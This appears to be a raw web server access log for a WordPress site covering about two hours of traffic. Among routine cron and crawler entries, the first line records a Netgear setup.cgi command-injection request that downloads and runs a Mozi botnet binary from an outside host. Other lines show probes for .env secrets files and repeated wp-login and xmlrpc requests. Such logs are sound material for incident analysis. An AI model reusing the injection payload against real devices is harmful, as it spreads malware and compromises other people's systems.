113.224.197.60 - - [29/Oct/2025:05:10:42 +0800] "GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://113.224.197.60:35058/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0" 404 31368 "-" "-"
36.133.115.36 - - [29/Oct/2025:05:14:22 +0800] "POST /wp-cron.php?doing_wp_cron=1761686062.2842569351196289062500 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
20.171.207.25 - - [29/Oct/2025:05:14:22 +0800] "GET /wp-sitemap.xml HTTP/1.1" 501 253 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
36.133.115.36 - - [29/Oct/2025:05:33:30 +0800] "POST /wp-cron.php?doing_wp_cron=1761687210.5847210884094238281250 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
78.153.140.203 - - [29/Oct/2025:05:33:30 +0800] "GET /.env HTTP/1.1" 404 31381 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.1; lt; rv:1.9.2) Gecko/20100115 Firefox/3.6"
36.133.115.36 - - [29/Oct/2025:05:34:55 +0800] "POST /wp-cron.php?doing_wp_cron=1761687295.3950641155242919921875 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
128.199.48.21 - - [29/Oct/2025:05:34:55 +0800] "POST /xmlrpc.php HTTP/1.1" 200 217 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:90.0) Gecko/20100101 Firefox/90.0"
36.133.115.36 - - [29/Oct/2025:05:50:35 +0800] "POST /wp-cron.php?doing_wp_cron=1761688235.9117400646209716796875 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
82.202.128.244 - - [29/Oct/2025:05:50:35 +0800] "GET /wp-login.php HTTP/1.1" 200 2780 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:85.0) Gecko/20100101 Firefox/91.0"
82.202.128.244 - - [29/Oct/2025:05:50:37 +0800] "POST /wp-login.php HTTP/1.1" 200 2919 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:85.0) Gecko/20100101 Firefox/91.0"
36.133.115.36 - - [29/Oct/2025:06:29:34 +0800] "POST /wp-cron.php?doing_wp_cron=1761690574.2542779445648193359375 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
146.70.134.15 - - [29/Oct/2025:06:29:34 +0800] "GET / HTTP/1.1" 301 5 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/136.0.0.0 Safari/537.36"
36.133.115.36 - - [29/Oct/2025:06:30:51 +0800] "POST /wp-cron.php?doing_wp_cron=1761690651.8030169010162353515625 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
91.231.89.10 - - [29/Oct/2025:06:30:51 +0800] "GET / HTTP/1.1" 301 5 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:134.0) Gecko/20100101 Firefox/134.0"
36.133.115.36 - - [29/Oct/2025:06:32:08 +0800] "POST /wp-cron.php?doing_wp_cron=1761690728.8451941013336181640625 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
5.75.229.140 - - [29/Oct/2025:06:32:08 +0800] "POST /xmlrpc.php HTTP/1.1" 200 217 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:69.0) Gecko/20100101 Firefox/69.0"
36.133.115.36 - - [29/Oct/2025:06:36:57 +0800] "POST /wp-cron.php?doing_wp_cron=1761691016.9645249843597412109375 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
157.230.185.105 - - [29/Oct/2025:06:36:57 +0800] "GET /wp-login.php HTTP/1.1" 200 2780 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:85.0) Gecko/20100101 Firefox/91.0"
157.230.185.105 - - [29/Oct/2025:06:36:58 +0800] "POST /wp-login.php HTTP/1.1" 200 2919 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:85.0) Gecko/20100101 Firefox/91.0"
91.231.89.97 - - [29/Oct/2025:07:00:25 +0800] "GET / HTTP/1.1" 200 153674 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:134.0) Gecko/20100101 Firefox/134.0"
36.133.115.36 - - [29/Oct/2025:07:26:23 +0800] "POST /wp-cron.php?doing_wp_cron=1761693983.1027059555053710937500 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
